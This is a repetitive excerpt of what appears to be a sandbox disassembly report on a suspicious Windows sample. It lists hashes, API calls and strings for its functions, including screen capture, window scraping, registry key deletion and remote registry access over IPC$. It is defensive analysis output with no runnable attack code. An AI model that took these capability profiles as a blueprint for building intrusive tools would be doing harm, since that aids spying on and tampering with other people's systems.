                                                        • Instruction ID: 26ddfb0acd777ac6e62fff0523f6ba72261453c13f7c0729685052143c7b639e
                                                        • Opcode Fuzzy Hash: 45bdbf43f32d3eea3d44f12cd31aa0f7959859ef907d3153a460da307cef9297
                                                        • Instruction Fuzzy Hash: E9C18A34208211EFD714EF24D494F2ABBE5BF85318F14849CF59A8B2A2CB39EC45CB91
                                                        APIs
                                                        • GetDC.USER32(00000000), ref: 007225D8
                                                        • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 007225E8
                                                        • CreateCompatibleDC.GDI32(?), ref: 007225F4
                                                        • SelectObject.GDI32(00000000,?), ref: 00722601
                                                        • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 0072266D
                                                        • GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 007226AC
                                                        • GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 007226D0
                                                        • SelectObject.GDI32(?,?), ref: 007226D8
                                                        • DeleteObject.GDI32(?), ref: 007226E1
                                                        • DeleteDC.GDI32(?), ref: 007226E8
                                                        • ReleaseDC.USER32(00000000,?), ref: 007226F3
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                        • String ID: (
                                                        • API String ID: 2598888154-3887548279
                                                        • Opcode ID: 53c639c54d69638a7b7bde069932950a307f47df69fe7f435fced598b13bf24c
                                                        • Instruction ID: 07d1050877cc11105a2a609401beb319672b2a0132ba8ceeb2ea7621b33a2c02
                                                        • Opcode Fuzzy Hash: 53c639c54d69638a7b7bde069932950a307f47df69fe7f435fced598b13bf24c
                                                        • Instruction Fuzzy Hash: 396113B6D00219EFDF15CFA4DC84AAEBBB6FF48310F208429E955A7250D774A941CF64
                                                        APIs
                                                        • ___free_lconv_mon.LIBCMT ref: 006DDAA1
                                                          • Part of subcall function 006DD63C: _free.LIBCMT ref: 006DD659
                                                          • Part of subcall function 006DD63C: _free.LIBCMT ref: 006DD66B
                                                          • Part of subcall function 006DD63C: _free.LIBCMT ref: 006DD67D
                                                          • Part of subcall function 006DD63C: _free.LIBCMT ref: 006DD68F
                                                          • Part of subcall function 006DD63C: _free.LIBCMT ref: 006DD6A1
                                                          • Part of subcall function 006DD63C: _free.LIBCMT ref: 006DD6B3
                                                          • Part of subcall function 006DD63C: _free.LIBCMT ref: 006DD6C5
                                                          • Part of subcall function 006DD63C: _free.LIBCMT ref: 006DD6D7
                                                          • Part of subcall function 006DD63C: _free.LIBCMT ref: 006DD6E9
                                                          • Part of subcall function 006DD63C: _free.LIBCMT ref: 006DD6FB
                                                          • Part of subcall function 006DD63C: _free.LIBCMT ref: 006DD70D
                                                          • Part of subcall function 006DD63C: _free.LIBCMT ref: 006DD71F
                                                          • Part of subcall function 006DD63C: _free.LIBCMT ref: 006DD731
                                                        • _free.LIBCMT ref: 006DDA96
                                                          • Part of subcall function 006D29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,006DD7D1,00000000,00000000,00000000,00000000,?,006DD7F8,00000000,00000007,00000000,?,006DDBF5,00000000), ref: 006D29DE
                                                          • Part of subcall function 006D29C8: GetLastError.KERNEL32(00000000,?,006DD7D1,00000000,00000000,00000000,00000000,?,006DD7F8,00000000,00000007,00000000,?,006DDBF5,00000000,00000000), ref: 006D29F0
                                                        • _free.LIBCMT ref: 006DDAB8
                                                        • _free.LIBCMT ref: 006DDACD
                                                        • _free.LIBCMT ref: 006DDAD8
                                                        • _free.LIBCMT ref: 006DDAFA
                                                        • _free.LIBCMT ref: 006DDB0D
                                                        • _free.LIBCMT ref: 006DDB1B
                                                        • _free.LIBCMT ref: 006DDB26
                                                        • _free.LIBCMT ref: 006DDB5E
                                                        • _free.LIBCMT ref: 006DDB65
                                                        • _free.LIBCMT ref: 006DDB82
                                                        • _free.LIBCMT ref: 006DDB9A
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                        • String ID:
                                                        • API String ID: 161543041-0
                                                        • Opcode ID: 5fd5e31266300c099d94a075196fd366224b7679fe77be2a5f088ddcea899e6e
                                                        • Instruction ID: 2241e99c7f60839ffd07b0983069f4721184d4e85bf8db2cbbc6f475e360c975
                                                        • Opcode Fuzzy Hash: 5fd5e31266300c099d94a075196fd366224b7679fe77be2a5f088ddcea899e6e
                                                        • Instruction Fuzzy Hash: 87317C71E042069FEB61BA39E851B9A77EAFF10714F14442FE449DB391DA30AC409724
                                                        APIs
                                                        • GetClassNameW.USER32(?,?,00000100), ref: 0070369C
                                                        • _wcslen.LIBCMT ref: 007036A7
                                                        • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00703797
                                                        • GetClassNameW.USER32(?,?,00000400), ref: 0070380C
                                                        • GetDlgCtrlID.USER32(?), ref: 0070385D
                                                        • GetWindowRect.USER32(?,?), ref: 00703882
                                                        • GetParent.USER32(?), ref: 007038A0
                                                        • ScreenToClient.USER32(00000000), ref: 007038A7
                                                        • GetClassNameW.USER32(?,?,00000100), ref: 00703921
                                                        • GetWindowTextW.USER32(?,?,00000400), ref: 0070395D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout_wcslen
                                                        • String ID: %s%u
                                                        • API String ID: 4010501982-679674701
                                                        • Opcode ID: 5882527444343c08f8870d8baa18486462216f06c8a5ee7a4e094bce5cd37010
                                                        • Instruction ID: 89f6bc9b4187392357892ea569b0d5c0cf5bddd9b17231cc30a8a2463fdf7414
                                                        • Opcode Fuzzy Hash: 5882527444343c08f8870d8baa18486462216f06c8a5ee7a4e094bce5cd37010
                                                        • Instruction Fuzzy Hash: DE919B71204606EFD719DF24C885FAAB7EDFF44354F008629F99AD21D0DB38AA45CBA1
                                                        APIs
                                                        • GetClassNameW.USER32(?,?,00000400), ref: 00704994
                                                        • GetWindowTextW.USER32(?,?,00000400), ref: 007049DA
                                                        • _wcslen.LIBCMT ref: 007049EB
                                                        • CharUpperBuffW.USER32(?,00000000), ref: 007049F7
                                                        • _wcsstr.LIBVCRUNTIME ref: 00704A2C
                                                        • GetClassNameW.USER32(00000018,?,00000400), ref: 00704A64
                                                        • GetWindowTextW.USER32(?,?,00000400), ref: 00704A9D
                                                        • GetClassNameW.USER32(00000018,?,00000400), ref: 00704AE6
                                                        • GetClassNameW.USER32(?,?,00000400), ref: 00704B20
                                                        • GetWindowRect.USER32(?,?), ref: 00704B8B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
                                                        • String ID: ThumbnailClass
                                                        • API String ID: 1311036022-1241985126
                                                        • Opcode ID: aac4de95c8cab77682b795f1ee608b824ef2ef1c16f57eb1b3af3f3aa0e49fa8
                                                        • Instruction ID: 20a7fd53d301464ebf5b319f36d6abe5837c4b62333b43f3676abb03d2940dc3
                                                        • Opcode Fuzzy Hash: aac4de95c8cab77682b795f1ee608b824ef2ef1c16f57eb1b3af3f3aa0e49fa8
                                                        • Instruction Fuzzy Hash: E591AAB2104205DBDB04DF14C985FAA77E9FF84314F048669FE869A0D6EB38ED45CBA1
                                                        APIs
                                                          • Part of subcall function 006B9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 006B9BB2
                                                        • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00738D5A
                                                        • GetFocus.USER32 ref: 00738D6A
                                                        • GetDlgCtrlID.USER32(00000000), ref: 00738D75
                                                        • DefDlgProcW.USER32(?,00000111,?,?,00000000,?,?,?,?,?,?,?), ref: 00738E1D
                                                        • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00738ECF
                                                        • GetMenuItemCount.USER32(?), ref: 00738EEC
                                                        • GetMenuItemID.USER32(?,00000000), ref: 00738EFC
                                                        • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00738F2E
                                                        • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00738F70
                                                        • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00738FA1
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
                                                        • String ID: 0
                                                        • API String ID: 1026556194-4108050209
                                                        • Opcode ID: 1d69d6385feb66bf39582a61142d24ea198c3367f6f4ebb2c6edc21ae6af30d4
                                                        • Instruction ID: df6afca90daaaad7b448a32b007ac2435954f39ed51c10d934c9f0ea8a7e9bf0
                                                        • Opcode Fuzzy Hash: 1d69d6385feb66bf39582a61142d24ea198c3367f6f4ebb2c6edc21ae6af30d4
                                                        • Instruction Fuzzy Hash: D281D171504311AFE761DF24C884EABBBE9FF88354F14491DF994A7292DB38D901CB62
                                                        APIs
                                                        • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0072CC64
                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 0072CC8D
                                                        • FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0072CD48
                                                          • Part of subcall function 0072CC34: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 0072CCAA
                                                          • Part of subcall function 0072CC34: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 0072CCBD
                                                          • Part of subcall function 0072CC34: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0072CCCF
                                                          • Part of subcall function 0072CC34: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0072CD05
                                                          • Part of subcall function 0072CC34: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0072CD28
                                                        • RegDeleteKeyW.ADVAPI32(?,?), ref: 0072CCF3
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
                                                        • String ID: RegDeleteKeyExW$advapi32.dll
                                                        • API String ID: 2734957052-4033151799
                                                        • Opcode ID: 0db65943e506dfa2b9233eaf691fc57c9065fd270cdc635b296a410a066b8676
                                                        • Instruction ID: 0c9b937aa7d8f24096ba8d26a1e2a6fff004a54991274e09c13941841cd11a66
                                                        • Opcode Fuzzy Hash: 0db65943e506dfa2b9233eaf691fc57c9065fd270cdc635b296a410a066b8676
                                                        • Instruction Fuzzy Hash: 5C3180B5A01129BBE7228B61EC88EFFBB7CEF15741F004165A906E7140D6789E45EBB0
                                                        APIs
                                                        • timeGetTime.WINMM ref: 0070E6B4
                                                          • Part of subcall function 006BE551: timeGetTime.WINMM(?,?,0070E6D4), ref: 006BE555
                                                        • Sleep.KERNEL32(0000000A), ref: 0070E6E1
                                                        • EnumThreadWindows.USER32(?,Function_0006E665,00000000), ref: 0070E705
                                                        • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 0070E727
                                                        • SetActiveWindow.USER32 ref: 0070E746
                                                        • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 0070E754
                                                        • SendMessageW.USER32(00000010,00000000,00000000), ref: 0070E773
                                                        • Sleep.KERNEL32(000000FA), ref: 0070E77E
                                                        • IsWindow.USER32 ref: 0070E78A
                                                        • EndDialog.USER32(00000000), ref: 0070E79B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                        • String ID: BUTTON
                                                        • API String ID: 1194449130-3405671355
                                                        • Opcode ID: 0768d6cdf5062dfb11b8bf8d5aaca7385c0550e05dfdfc736fd125d0d06750cd
                                                        • Instruction ID: 93171b1712206e5081e77dfeca2b9b63a28fe41a93897102e2304d62b7997657
                                                        • Opcode Fuzzy Hash: 0768d6cdf5062dfb11b8bf8d5aaca7385c0550e05dfdfc736fd125d0d06750cd
                                                        • Instruction Fuzzy Hash: 652162B1300204EFFB016F24EC89A253BA9E75438AF649925F51AD15E2DB7E9C419B1C
                                                        APIs
                                                          • Part of subcall function 006A9CB3: _wcslen.LIBCMT ref: 006A9CBD
                                                        • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0070EA5D
                                                        • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0070EA73
                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0070EA84
                                                        • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0070EA96
                                                        • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0070EAA7
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: SendString$_wcslen
                                                        • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                        • API String ID: 2420728520-1007645807
                                                        • Opcode ID: 47d6a27abeac35565e765330b665fab178ca5dd21412a2fde3a894cb0196904f
                                                        • Instruction ID: 21f06329cda9b778a28cdace0f04dae0d0b8fd59f49b479479c9c48f8fd354af
                                                        • Opcode Fuzzy Hash: 47d6a27abeac35565e765330b665fab178ca5dd21412a2fde3a894cb0196904f
                                                        • Instruction Fuzzy Hash: 161151B1A5026979D760B7A1DC4ADFF6ABCEBD6B40F44492D7C02A20D1EEB41D05C9B0
                                                        APIs
                                                          • Part of subcall function 006B8F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,006B8BE8,?,00000000,?,?,?,?,006B8BBA,00000000,?), ref: 006B8FC5
                                                        • DestroyWindow.USER32(?), ref: 006B8C81
                                                        • KillTimer.USER32(00000000,?,?,?,?,006B8BBA,00000000,?), ref: 006B8D1B
                                                        • DestroyAcceleratorTable.USER32(00000000), ref: 006F6973
                                                        • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,006B8BBA,00000000,?), ref: 006F69A1
                                                        • ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,006B8BBA,00000000,?), ref: 006F69B8
                                                        • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,006B8BBA,00000000), ref: 006F69D4
                                                        • DeleteObject.GDI32(00000000), ref: 006F69E6
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                        • String ID:
                                                        • API String ID: 641708696-0
                                                        • Opcode ID: 37abb6adb3420ff4155ff221bedf60567fbedc66a8be02f435baf2750aafea36
                                                        • Instruction ID: 09191c7d0aa15586a177b0927d198bc55e3bc274aaf94f232fb08bde55e344d2
                                                        • Opcode Fuzzy Hash: 37abb6adb3420ff4155ff221bedf60567fbedc66a8be02f435baf2750aafea36
                                                        • Instruction Fuzzy Hash: 5861DCB1002705DFDB268F18C948BB57BF6FB40352F54881CE2469B660CB79A8D2DF98
                                                        APIs
                                                          • Part of subcall function 006B9944: GetWindowLongW.USER32(?,000000EB), ref: 006B9952
                                                        • GetSysColor.USER32(0000000F), ref: 006B9862
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: ColorLongWindow
                                                        • String ID:
                                                        • API String ID: 259745315-0
                                                        • Opcode ID: 487991aaa57c3c6f9039ef20de7dbde451259fc43dda6daf6b6b59d2b775b7b2
                                                        • Instruction ID: 532dc5fb92832fb5d5a0eadc8579d4cc0adcefe79de17b875be8637deeeacd59
                                                        • Opcode Fuzzy Hash: 487991aaa57c3c6f9039ef20de7dbde451259fc43dda6daf6b6b59d2b775b7b2
                                                        • Instruction Fuzzy Hash: 7841B7B11046549FDB215F389C44BF937B6EB06331F148A15FBA29B2E1D7359C82DB20
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: .l
                                                        • API String ID: 0-3986846653
                                                        • Opcode ID: 59540dcf72021866e132638e56e921c181195679fc3f0a28d7aede32c3bfa57b
                                                        • Instruction ID: 80de434d18419b0b9bcf76c353f935900dc36dbb56afd15ded32821f958e2ad2
                                                        • Opcode Fuzzy Hash: 59540dcf72021866e132638e56e921c181195679fc3f0a28d7aede32c3bfa57b
                                                        • Instruction Fuzzy Hash: 86C1D274E04349AFDB21EFA8D845BEDBBB2AF09310F14409EE519A7392C7349A41CB75
                                                        APIs
                                                        • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,?,?,006EF7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?), ref: 00709717
                                                        • LoadStringW.USER32(00000000,?,006EF7F8,00000001), ref: 00709720
                                                          • Part of subcall function 006A9CB3: _wcslen.LIBCMT ref: 006A9CBD
                                                        • GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,006EF7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?,00000000), ref: 00709742
                                                        • LoadStringW.USER32(00000000,?,006EF7F8,00000001), ref: 00709745
                                                        • MessageBoxW.USER32(00000000,00000000,?,00011010), ref: 00709866
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: HandleLoadModuleString$Message_wcslen
                                                        • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                        • API String ID: 747408836-2268648507
                                                        • Opcode ID: 8902fd768f0886a768f449ec5f3a3ff5a274d5dda815ee89ab2c74ea128f66ad
                                                        • Instruction ID: 023cf2a8adb630f5aa765e847e8de1e92dd9b3e287cbeca3f5f2a566147aaa5a
                                                        • Opcode Fuzzy Hash: 8902fd768f0886a768f449ec5f3a3ff5a274d5dda815ee89ab2c74ea128f66ad
                                                        • Instruction Fuzzy Hash: E8415D72800219AACF44FBE0CD46DEE7779AF56340F604129F60672192EB396F48CF65
                                                        APIs
                                                          • Part of subcall function 006A6B57: _wcslen.LIBCMT ref: 006A6B6A
                                                        • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 007007A2
                                                        • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 007007BE
                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 007007DA
                                                        • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00700804
                                                        • CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 0070082C
                                                        • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00700837
                                                        • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0070083C
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
                                                        • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                        • API String ID: 323675364-22481851
                                                        • Opcode ID: d2adfb4593ba3f92ed5fc0639386b9b1c40914a4c0398bdf7808bd971f773b40
                                                        • Instruction ID: 98cbc07952619a108fbf98ae40bea86ad9c0b5faf3c9919b3635668f953cfc1b
                                                        • Opcode Fuzzy Hash: d2adfb4593ba3f92ed5fc0639386b9b1c40914a4c0398bdf7808bd971f773b40
